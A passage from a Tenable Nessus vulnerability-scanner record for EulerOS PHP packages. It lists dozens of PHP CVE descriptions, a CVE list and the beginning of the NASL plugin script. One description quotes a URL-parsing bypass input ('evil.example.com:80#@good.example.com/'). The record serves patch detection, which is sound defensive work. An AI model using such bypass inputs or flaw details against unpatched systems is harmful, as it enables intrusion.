opened.(CVE-2015-7803)\n\n - Use-after-free vulnerability in the spl_ptr_heap_insert function in ext/spl/spl_heap.c in PHP before 5.5.27 and 5.6.x before 5.6.11 allows remote attackers to execute arbitrary code by triggering a failed SplMinHeap::compare operation.(CVE-2015-4116)\n\n - The get_icu_disp_value_src_php function in ext/intl/locale/locale_methods.c in PHP before 5.3.29, 5.4.x before 5.4.30, and 5.5.x before 5.5.14 does not properly restrict calls to the ICU uresbund.cpp component, which allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact via a locale_get_display_name call with a long first argument.(CVE-2014-9912)\n\n - The header() PHP function allowed header stings containing line break followed by a space or tab, as allowed by RFC 2616. Certain browsers handled the continuation line as new header, making it possible to conduct a HTTP response splitting attack against such browsers. The header() function was updated to follow RFC 7230 and not allow any line breaks.(CVE-2015-8935)\n\n - The openssl_random_pseudo_bytes function in ext/openssl/openssl.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 incorrectly relies on the deprecated RAND_pseudo_bytes function, which makes it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors.(CVE-2015-8867)\n\n - A flaw was found in the way the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.(CVE-2015-6833)\n\n - A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-6832)\n\n - Directory traversal vulnerability in the ZipArchive::extractTo function in ext/zip/php_zip.c in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13 and ext/zip/ext_zip.cpp in HHVM before 3.12.1 allows remote attackers to create arbitrary empty directories via a crafted ZIP archive.(CVE-2014-9767)\n\n - In PHP before 5.6.31, an invalid free in the WDDX deserialization of boolean parameters could be used by attackers able to inject XML for deserialization to crash the PHP interpreter, related to an invalid free for an empty boolean element in ext/wddx/wddx.c.(CVE-2017-11143)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c in PHP before 5.6.29 and 7.x before 7.0.14 allows remote attackers to cause a denial of service (out-of-bounds read and memory corruption) or possibly have unspecified other impact via an empty boolean element in a wddxPacket XML document.(CVE-2016-9935)\n\n - ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before 7.0.13 allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted serialized data in a wddxPacket XML document, as demonstrated by a PDORow string.(CVE-2016-9934)\n\n - The ZIP signature-verification feature in PHP before 5.6.26 and 7.x before 7.0.11 does not ensure that the uncompressed_filesize field is large enough, which allows remote attackers to cause a denial of service (out-of-bounds memory access) or possibly have unspecified other impact via a crafted PHAR archive, related to ext/phar/util.c and ext/phar/zip.c.(CVE-2016-7414)\n\n - Integer overflow in the php_html_entities function in ext/standard/html.c in PHP before 5.5.36 and 5.6.x before 5.6.22 allows remote attackers to cause a denial of service or possibly have unspecified other impact by triggering a large output string from the htmlspecialchars function.(CVE-2016-5094)\n\n - The get_icu_value_internal function in ext/intl/locale/locale_methods.c in PHP before 5.5.36, 5.6.x before 5.6.22, and 7.x before 7.0.7 does not ensure the presence of a '\\\\0' character, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a crafted locale_get_primary_language call.(CVE-2016-5093)\n\n - The exif_process_IFD_TAG function in ext/exif/exif.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 does not properly construct spprintf arguments, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data.(CVE-2016-4542)\n\n - The grapheme_stripos function in ext/intl/grapheme/grapheme_string.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a negative offset.(CVE-2016-4540)\n\n - The xml_parse_into_struct function in ext/xml/xml.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (buffer under-read and segmentation fault) or possibly have unspecified other impact via crafted XML data in the second argument, leading to a parser level of zero.(CVE-2016-4539)\n\n - ** DISPUTED ** Integer overflow in the php_raw_url_encode function in ext/standard/url.c in PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before 7.0.5 allows remote attackers to cause a denial of service (application crash) via a long string to the rawurlencode function. NOTE: the vendor says 'Not sure if this qualifies as security issue (probably not).'(CVE-2016-4070)\n\n - The phar_parse_zipfile function in zip.c in the PHAR extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read and application crash) by placing a PK\\\\x05\\\\x06 signature at an invalid location.(CVE-2016-3142)\n\n - Use-after-free vulnerability in wddx.c in the WDDX extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact by triggering a wddx_deserialize call on XML data containing a crafted var element.(CVE-2016-3141)\n\n - The odbc_bindcols function in ext/odbc/php_odbc.c in PHP before 5.6.12 mishandles driver behavior for SQL_WVARCHAR columns, which allows remote attackers to cause a denial of service (application crash) in opportunistic circumstances by leveraging use of the odbc_fetch_array function to access a certain type of Microsoft SQL Server table.(CVE-2015-8879)\n\n - In PHP before 5.6.30 and 7.x before 7.0.15, the PHAR archive handler could be used by attackers supplying malicious archive files to crash the PHP interpreter or potentially disclose information due to a buffer over-read in the phar_parse_pharfile function in ext/phar/phar.c.(CVE-2017-11147)\n\n - ext/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1)\n __destruct call or (2) magic method call.(CVE-2016-7124)\n\n - Stack-based buffer overflow in ext/phar/tar.c in PHP before 5.5.32, 5.6.x before 5.6.18, and 7.x before 7.0.3 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted TAR archive.(CVE-2016-2554)\n\n - A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.(CVE-2015-6831)\n\n - The make_http_soap_request function in ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before 5.5.28, 5.6.x before 5.6.12, and 7.x before 7.0.4 allows remote attackers to obtain sensitive information from process memory or cause a denial of service (type confusion and application crash) via crafted serialized\n _cookies data, related to the SoapClient::__call method in ext/soap/soap.c.(CVE-2016-3185)\n\n - The object_common1 function in ext/standard/var_unserializer.c in PHP before 5.6.30, 7.0.x before 7.0.15, and 7.1.x before 7.1.1 allows remote attackers to cause a denial of service (buffer over-read and application crash) via crafted serialized data that is mishandled in a finish_nested_data call.(CVE-2016-10161)\n\n - The finish_nested_data function in ext/standard/var_unserializer.re in PHP before 5.6.31, 7.0.x before 7.0.21, and 7.1.x before 7.1.7 is prone to a buffer over-read while unserializing untrusted data.\n Exploitation of this issue can have an unspecified impact on the integrity of PHP.(CVE-2017-12933)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, the openssl extension PEM sealing code did not check the return value of the OpenSSL sealing function, which could lead to a crash of the PHP interpreter, related to an interpretation conflict for a negative number in ext/openssl/openssl.c, and an OpenSSL documentation omission.(CVE-2017-11144)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write or read occurs in next_state_val() during regular expression compilation. Octal numbers larger than 0xff are not handled correctly in fetch_token() and fetch_token_in_cc(). A malformed regular expression containing an octal number in the form of '\\700' would produce an invalid code point value larger than 0xff in next_state_val(), resulting in an out-of-bounds write memory corruption.(CVE-2017-9226)\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.(CVE-2019-11043)\n\n - Session fixation vulnerability in the Sessions subsystem in PHP before 5.5.2 allows remote attackers to hijack web sessions by specifying a session ID.(CVE-2011-4718)\n\n - In PHP before 5.6.32, 7.x before 7.0.25, and 7.1.x before 7.1.11, an error in the date extension's timelib_meridian handling of 'front of' and 'back of' directives could be used by attackers able to supply date strings to leak information from the interpreter, related to ext/date/lib/parse_date.c out-of-bounds reads affecting the php_parse_date function. NOTE: this is a different issue than CVE-2017-11145.(CVE-2017-16642)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, an error in the date extension's timelib_meridian parsing code could be used by attackers able to supply date strings to leak information from the interpreter, related to ext/date/lib/parse_date.c out-of-bounds reads affecting the php_parse_date function. NOTE: the correct fix is in the e8b7698f5ee757ce2c8bd10a192a491a498f891c commit, not the bd77ac90d3bdf31ce2a5251ad92e9e75 gist.(CVE-2017-11145)\n\n - In PHP before 5.6.28 and 7.x before 7.0.13, incorrect handling of various URI components in the URL parser could be used by attackers to bypass hostname-specific URL checks, as demonstrated by evil.example.com:80#@good.example.com/ and evil.example.com:80?@good.example.com/ inputs to the parse_url function (implemented in the php_url_parse_ex function in ext/standard/url.c).(CVE-2016-10397)\n\n - ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before 7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag, which allows remote MySQL servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via crafted field metadata.(CVE-2016-7412)\n\n - Oniguruma through 6.9.3, as used in PHP 7.3.x and other products, has a heap-based buffer over-read in str_lower_case_match in regexec.c.(CVE-2019-19246)\n\n - When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.(CVE-2019-11047)\n\n - PHP through 7.1.11 enables potential SSRF in applications that accept an fsockopen or pfsockopen hostname argument with an expectation that the port number is constrained. Because a :port syntax is recognized, fsockopen will use the port number that is specified in the hostname argument, instead of the port number in the second argument of the function.(CVE-2017-7272)\n\n - When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.(CVE-2019-11050)\n\n - An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function fetch_interval_quantifier (formerly known as fetch_range_quantifier) in regparse.c, PFETCH is called without checking PEND.\n This leads to a heap-based buffer over-read.(CVE-2019-19204)\n\n - An issue was discovered in the EXIF component in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. There is an uninitialized read in exif_process_IFD_in_TIFF.(CVE-2019-9641)\n\n - Double free vulnerability in the php_wddx_process_data function in wddx.c in the WDDX extension in PHP before 5.5.37, 5.6.x before 5.6.23, and 7.x before 7.0.8 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via crafted XML data that is mishandled in a wddx_deserialize call.(CVE-2016-5772)\n\n - Multiple integer overflows in the mbfl_strcut function in ext/mbstring/libmbfl/mbfl/mbfilter.c in PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before 7.0.5 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted mb_strcut call.(CVE-2016-4073)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-07-01T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.6.0 : php (EulerOS-SA-2020-1747)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4718", "CVE-2014-9767", "CVE-2014-9912", "CVE-2015-4116", "CVE-2015-5161", "CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-7803", "CVE-2015-7804", "CVE-2015-8866", "CVE-2015-8867", "CVE-2015-8874", "CVE-2015-8879", "CVE-2015-8935", "CVE-2016-10158", "CVE-2016-10159", "CVE-2016-10161", "CVE-2016-10397", "CVE-2016-2554", "CVE-2016-3141", "CVE-2016-3142", "CVE-2016-3185", "CVE-2016-4070", "CVE-2016-4073", "CVE-2016-4539", "CVE-2016-4540", "CVE-2016-4542", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5772", "CVE-2016-6288", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6294", "CVE-2016-7124", "CVE-2016-7125", "CVE-2016-7128", "CVE-2016-7412", "CVE-2016-7414", "CVE-2016-7418", "CVE-2016-9934", "CVE-2016-9935", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11147", "CVE-2017-11628", "CVE-2017-12933", "CVE-2017-16642", "CVE-2017-7272", "CVE-2017-9226", "CVE-2018-10545", "CVE-2018-10547", "CVE-2018-14851", "CVE-2018-17082", "CVE-2018-5711", "CVE-2018-5712", "CVE-2019-11041", "CVE-2019-11042", "CVE-2019-11043", "CVE-2019-11047", "CVE-2019-11050", "CVE-2019-19204", "CVE-2019-19246", "CVE-2019-9641"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:php", "p-cpe:/a:huawei:euleros:php-cli", "p-cpe:/a:huawei:euleros:php-common", "cpe:/o:huawei:euleros:uvp:3.0.6.0"], "id": "EULEROS_SA-2020-1747.NASL", "href": "https://www.tenable.com/plugins/nessus/137966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137966);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2011-4718\",\n \"CVE-2014-9767\",\n \"CVE-2014-9912\",\n \"CVE-2015-4116\",\n \"CVE-2015-6831\",\n \"CVE-2015-6832\",\n \"CVE-2015-6833\",\n \"CVE-2015-7803\",\n \"CVE-2015-7804\",\n \"CVE-2015-8866\",\n \"CVE-2015-8867\",\n \"CVE-2015-8874\",\n \"CVE-2015-8879\",\n \"CVE-2015-8935\",\n \"CVE-2016-10158\",\n \"CVE-2016-10159\",\n \"CVE-2016-10161\",\n \"CVE-2016-10397\",\n \"CVE-2016-2554\",\n \"CVE-2016-3141\",\n \"CVE-2016-3142\",\n \"CVE-2016-3185\",\n \"CVE-2016-4070\",\n \"CVE-2016-4073\",\n \"CVE-2016-4539\",\n \"CVE-2016-4540\",\n \"CVE-2016-4542\",\n \"CVE-2016-5093\",\n \"CVE-2016-5094\",\n \"CVE-2016-5772\",\n \"CVE-2016-6288\",\n \"CVE-2016-6291\",\n \"CVE-2016-6292\",\n \"CVE-2016-6294\",\n \"CVE-2016-7124\",\n \"CVE-2016-7125\",\n \"CVE-2016-7128\",\n \"CVE-2016-7412\",\n \"CVE-2016-7414\",\n \"CVE-2016-7418\",\n \"CVE-2016-9934\",\n \"CVE-2016-9935\",\n \"CVE-2017-11143\",\n \"CVE-2017-11144\",\n \"CVE-2017-11145\",\n \"CVE-2017-11147\",\n \"CVE-2017-11628\",\n \"CVE-2017-12933\",\n \"CVE-2017-16642\",\n \"CVE-2017-7272\",\n \"CVE-2017-9226\",\n \"CVE-2018-10545\",\n \"CVE-2018-10547\",\n \"CVE-2018-14851\",\n \"CVE-2018-17082\",\n \"CVE-2018-5711\",\n \"CVE-2018-5712\",\n \"CVE-2019-11041\",\n \"CVE-2019-11042\",\n \"CVE-2019-11043\",\n \"CVE-2019-11047\",\n \"CVE-2019-11050\",\n \"CVE-2019-19204\",\n \"CVE-2019-19246\",\n \"CVE-2019-9641\"\n );\n script_bugtraq_id(61929);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0695\");\n\n script_name(english:\"EulerOS Virtualization 3.0.6.0 : php (EulerOS-SA-2020-1747)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the php packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - When PHP EXIF extension is parsing EXIF information\n from an image, e.g. via exif_read_data() function, in\n PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and\n 7.3.x below 7.3.8 it is possible to supply it with data\n what will cause it to read past the allocated buffer.\n This may lead to information disclosure or\n crash.(CVE-2019-11042)\n\n - When PHP EXIF extension is parsing EXIF information\n from an image, e.g. via exif_read_data() function, in\n PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and\n 7.3.x below 7.3.8 it is possible to supply it with data\n what will cause it to read past the allocated buffer.\n This may lead to information disclosure or\n crash.(CVE-2019-11041)\n\n - An issue was discovered in PHP before 5.6.33, 7.0.x\n before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before\n 7.2.1. There is Reflected XSS on the PHAR 404 error\n page via the URI of a request for a .phar\n file.(CVE-2018-5712)\n\n - gd_gif_in.c in the GD Graphics Library (aka libgd), as\n used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x\n before 7.1.13, and 7.2.x before 7.2.1, has an integer\n signedness error that leads to an infinite loop via a\n crafted GIF file, as demonstrated by a call to the\n imagecreatefromgif or imagecreatefromstring PHP\n function. This is related to GetCode_ and\n gdImageCreateFromGifCtx.(CVE-2018-5711)\n\n - The Apache2 component in PHP before 5.6.38, 7.0.x\n before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before\n 7.2.10 allows XSS via the body of a 'Transfer-Encoding:\n chunked' request, because the bucket brigade is\n mishandled in the php_handler function in\n sapi/apache2handler/sapi_apache2.c.(CVE-2018-17082)\n\n - exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP\n before 5.6.37, 7.0.x before 7.0.31, 7.1.x before\n 7.1.20, and 7.2.x before 7.2.8 allows remote attackers\n to cause a denial of service (out-of-bounds read and\n application crash) via a crafted JPEG\n file.(CVE-2018-14851)\n\n - An issue was discovered in ext/phar/phar_object.c in\n PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before\n 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS\n on the PHAR 403 and 404 error pages via request data of\n a request for a .phar file. NOTE: this vulnerability\n exists because of an incomplete fix for\n CVE-2018-5712.(CVE-2018-10547)\n\n - An issue was discovered in PHP before 5.6.35, 7.0.x\n before 7.0.29, 7.1.x before 7.1.16, and 7.2.x before\n 7.2.4. Dumpable FPM child processes allow bypassing\n opcache access controls because fpm_unix.c makes a\n PR_SET_DUMPABLE prctl call, allowing one user (in a\n multiuser environment) to obtain sensitive information\n from the process memory of a second user's PHP\n applications by running gcore on the PID of the PHP-FPM\n worker process.(CVE-2018-10545)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x\n before 7.1.7, a stack-based buffer overflow in the\n zend_ini_do_op() function in Zend/zend_ini_parser.c\n could cause a denial of service or potentially allow\n executing code. NOTE: this is only relevant for PHP\n applications that accept untrusted input (instead of\n the system's php.ini file) for the parse_ini_string or\n parse_ini_file function, e.g., a web application for\n syntax validation of php.ini\n directives.(CVE-2017-11628)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c\n in PHP before 5.6.26 and 7.x before 7.0.11 allows\n remote attackers to cause a denial of service (invalid\n pointer access and out-of-bounds read) or possibly have\n unspecified other impact via an incorrect boolean\n element in a wddxPacket XML document, leading to\n mishandling in a wddx_deserialize call.(CVE-2016-7418)\n\n - The exif_process_IFD_in_TIFF function in\n ext/exif/exif.c in PHP before 5.6.25 and 7.x before\n 7.0.10 mishandles the case of a thumbnail offset that\n exceeds the file size, which allows remote attackers to\n obtain sensitive information from process memory via a\n crafted TIFF image.(CVE-2016-7128)\n\n - ext/session/session.c in PHP before 5.6.25 and 7.x\n before 7.0.10 skips invalid session names in a way that\n triggers incorrect parsing, which allows remote\n attackers to inject arbitrary-type session data by\n leveraging control of a session name, as demonstrated\n by object injection.(CVE-2016-7125)\n\n - The locale_accept_from_http function in\n ext/intl/locale/locale_methods.c in PHP before 5.5.38,\n 5.6.x before 5.6.24, and 7.x before 7.0.9 does not\n properly restrict calls to the ICU\n uloc_acceptLanguageFromHTTP function, which allows\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a call with a long argument.(CVE-2016-6294)\n\n - The exif_process_user_comment function in\n ext/exif/exif.c in PHP before 5.5.38, 5.6.x before\n 5.6.24, and 7.x before 7.0.9 allows remote attackers to\n cause a denial of service (NULL pointer dereference and\n application crash) via a crafted JPEG\n image.(CVE-2016-6292)\n\n - The exif_process_IFD_in_MAKERNOTE function in\n ext/exif/exif.c in PHP before 5.5.38, 5.6.x before\n 5.6.24, and 7.x before 7.0.9 allows remote attackers to\n cause a denial of service (out-of-bounds array access\n and memory corruption), obtain sensitive information\n from process memory, or possibly have unspecified other\n impact via a crafted JPEG image.(CVE-2016-6291)\n\n - The php_url_parse_ex function in ext/standard/url.c in\n PHP before 5.5.38 allows remote attackers to cause a\n denial of service (buffer over-read) or possibly have\n unspecified other impact via vectors involving the\n smart_str data type.(CVE-2016-6288)\n\n - Integer overflow in the phar_parse_pharfile function in\n ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before\n 7.0.15 allows remote attackers to cause a denial of\n service (memory consumption or application crash) via a\n truncated manifest entry in a PHAR\n archive.(CVE-2016-10159)\n\n - It was found that the exif_convert_any_to_int()\n function in PHP was vulnerable to floating point\n exceptions when parsing tags in image files. A remote\n attacker with the ability to upload a malicious image\n could crash PHP, causing a Denial of\n Service.(CVE-2016-10158)\n\n - Stack consumption vulnerability in GD in PHP before\n 5.6.12 allows remote attackers to cause a denial of\n service via a crafted imagefilltoborder\n call.(CVE-2015-8874)\n\n - ext/libxml/libxml.c in PHP before 5.5.22 and 5.6.x\n before 5.6.6, when PHP-FPM is used, does not isolate\n each thread from libxml_disable_entity_loader changes\n in other threads, which allows remote attackers to\n conduct XML External Entity (XXE) and XML Entity\n Expansion (XEE) attacks via a crafted XML document, a\n related issue to CVE-2015-5161.(CVE-2015-8866)\n\n - A flaw was found in the way the way PHP's Phar\n extension parsed Phar archives. A specially crafted\n archive could cause PHP to crash or, possibly, execute\n arbitrary code when opened.(CVE-2015-7804)\n\n - A flaw was found in the way the way PHP's Phar\n extension parsed Phar archives. A specially crafted\n archive could cause PHP to crash or, possibly, execute\n arbitrary code when opened.(CVE-2015-7803)\n\n - Use-after-free vulnerability in the spl_ptr_heap_insert\n function in ext/spl/spl_heap.c in PHP before 5.5.27 and\n 5.6.x before 5.6.11 allows remote attackers to execute\n arbitrary code by triggering a failed\n SplMinHeap::compare operation.(CVE-2015-4116)\n\n - The get_icu_disp_value_src_php function in\n ext/intl/locale/locale_methods.c in PHP before 5.3.29,\n 5.4.x before 5.4.30, and 5.5.x before 5.5.14 does not\n properly restrict calls to the ICU uresbund.cpp\n component, which allows remote attackers to cause a\n denial of service (buffer overflow) or possibly have\n unspecified other impact via a locale_get_display_name\n call with a long first argument.(CVE-2014-9912)\n\n - The header() PHP function allowed header stings\n containing line break followed by a space or tab, as\n allowed by RFC 2616. Certain browsers handled the\n continuation line as new header, making it possible to\n conduct a HTTP response splitting attack against such\n browsers. The header() function was updated to follow\n RFC 7230 and not allow any line breaks.(CVE-2015-8935)\n\n - The openssl_random_pseudo_bytes function in\n ext/openssl/openssl.c in PHP before 5.4.44, 5.5.x\n before 5.5.28, and 5.6.x before 5.6.12 incorrectly\n relies on the deprecated RAND_pseudo_bytes function,\n which makes it easier for remote attackers to defeat\n cryptographic protection mechanisms via unspecified\n vectors.(CVE-2015-8867)\n\n - A flaw was found in the way the way PHP's Phar\n extension parsed Phar archives. A specially crafted\n archive could cause PHP to crash or, possibly, execute\n arbitrary code when opened.(CVE-2015-6833)\n\n - A flaw was discovered in the way PHP performed object\n unserialization. Specially crafted input processed by\n the unserialize() function could cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2015-6832)\n\n - Directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c in\n PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x\n before 5.6.13 and ext/zip/ext_zip.cpp in HHVM before\n 3.12.1 allows remote attackers to create arbitrary\n empty directories via a crafted ZIP\n archive.(CVE-2014-9767)\n\n - In PHP before 5.6.31, an invalid free in the WDDX\n deserialization of boolean parameters could be used by\n attackers able to inject XML for deserialization to\n crash the PHP interpreter, related to an invalid free\n for an empty boolean element in\n ext/wddx/wddx.c.(CVE-2017-11143)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c\n in PHP before 5.6.29 and 7.x before 7.0.14 allows\n remote attackers to cause a denial of service\n (out-of-bounds read and memory corruption) or possibly\n have unspecified other impact via an empty boolean\n element in a wddxPacket XML document.(CVE-2016-9935)\n\n - ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before\n 7.0.13 allows remote attackers to cause a denial of\n service (NULL pointer dereference) via crafted\n serialized data in a wddxPacket XML document, as\n demonstrated by a PDORow string.(CVE-2016-9934)\n\n - The ZIP signature-verification feature in PHP before\n 5.6.26 and 7.x before 7.0.11 does not ensure that the\n uncompressed_filesize field is large enough, which\n allows remote attackers to cause a denial of service\n (out-of-bounds memory access) or possibly have\n unspecified other impact via a crafted PHAR archive,\n related to ext/phar/util.c and\n ext/phar/zip.c.(CVE-2016-7414)\n\n - Integer overflow in the php_html_entities function in\n ext/standard/html.c in PHP before 5.5.36 and 5.6.x\n before 5.6.22 allows remote attackers to cause a denial\n of service or possibly have unspecified other impact by\n triggering a large output string from the\n htmlspecialchars function.(CVE-2016-5094)\n\n - The get_icu_value_internal function in\n ext/intl/locale/locale_methods.c in PHP before 5.5.36,\n 5.6.x before 5.6.22, and 7.x before 7.0.7 does not\n ensure the presence of a '\\\\0' character, which allows\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a crafted locale_get_primary_language\n call.(CVE-2016-5093)\n\n - The exif_process_IFD_TAG function in ext/exif/exif.c in\n PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before\n 7.0.6 does not properly construct spprintf arguments,\n which allows remote attackers to cause a denial of\n service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header\n data.(CVE-2016-4542)\n\n - The grapheme_stripos function in\n ext/intl/grapheme/grapheme_string.c in PHP before\n 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6\n allows remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a negative offset.(CVE-2016-4540)\n\n - The xml_parse_into_struct function in ext/xml/xml.c in\n PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before\n 7.0.6 allows remote attackers to cause a denial of\n service (buffer under-read and segmentation fault) or\n possibly have unspecified other impact via crafted XML\n data in the second argument, leading to a parser level\n of zero.(CVE-2016-4539)\n\n - ** DISPUTED ** Integer overflow in the\n php_raw_url_encode function in ext/standard/url.c in\n PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before\n 7.0.5 allows remote attackers to cause a denial of\n service (application crash) via a long string to the\n rawurlencode function. NOTE: the vendor says 'Not sure\n if this qualifies as security issue (probably\n not).'(CVE-2016-4070)\n\n - The phar_parse_zipfile function in zip.c in the PHAR\n extension in PHP before 5.5.33 and 5.6.x before 5.6.19\n allows remote attackers to obtain sensitive information\n from process memory or cause a denial of service\n (out-of-bounds read and application crash) by placing a\n PK\\\\x05\\\\x06 signature at an invalid\n location.(CVE-2016-3142)\n\n - Use-after-free vulnerability in wddx.c in the WDDX\n extension in PHP before 5.5.33 and 5.6.x before 5.6.19\n allows remote attackers to cause a denial of service\n (memory corruption and application crash) or possibly\n have unspecified other impact by triggering a\n wddx_deserialize call on XML data containing a crafted\n var element.(CVE-2016-3141)\n\n - The odbc_bindcols function in ext/odbc/php_odbc.c in\n PHP before 5.6.12 mishandles driver behavior for\n SQL_WVARCHAR columns, which allows remote attackers to\n cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the\n odbc_fetch_array function to access a certain type of\n Microsoft SQL Server table.(CVE-2015-8879)\n\n - In PHP before 5.6.30 and 7.x before 7.0.15, the PHAR\n archive handler could be used by attackers supplying\n malicious archive files to crash the PHP interpreter or\n potentially disclose information due to a buffer\n over-read in the phar_parse_pharfile function in\n ext/phar/phar.c.(CVE-2017-11147)\n\n - ext/standard/var_unserializer.c in PHP before 5.6.25\n and 7.x before 7.0.10 mishandles certain invalid\n objects, which allows remote attackers to cause a\n denial of service or possibly have unspecified other\n impact via crafted serialized data that leads to a (1)\n __destruct call or (2) magic method\n call.(CVE-2016-7124)\n\n - Stack-based buffer overflow in ext/phar/tar.c in PHP\n before 5.5.32, 5.6.x before 5.6.18, and 7.x before\n 7.0.3 allows remote attackers to cause a denial of\n service (application crash) or possibly have\n unspecified other impact via a crafted TAR\n archive.(CVE-2016-2554)\n\n - A flaw was discovered in the way PHP performed object\n unserialization. Specially crafted input processed by\n the unserialize() function could cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2015-6831)\n\n - The make_http_soap_request function in\n ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before\n 5.5.28, 5.6.x before 5.6.12, and 7.x before 7.0.4\n allows remote attackers to obtain sensitive information\n from process memory or cause a denial of service (type\n confusion and application crash) via crafted serialized\n _cookies data, related to the SoapClient::__call method\n in ext/soap/soap.c.(CVE-2016-3185)\n\n - The object_common1 function in\n ext/standard/var_unserializer.c in PHP before 5.6.30,\n 7.0.x before 7.0.15, and 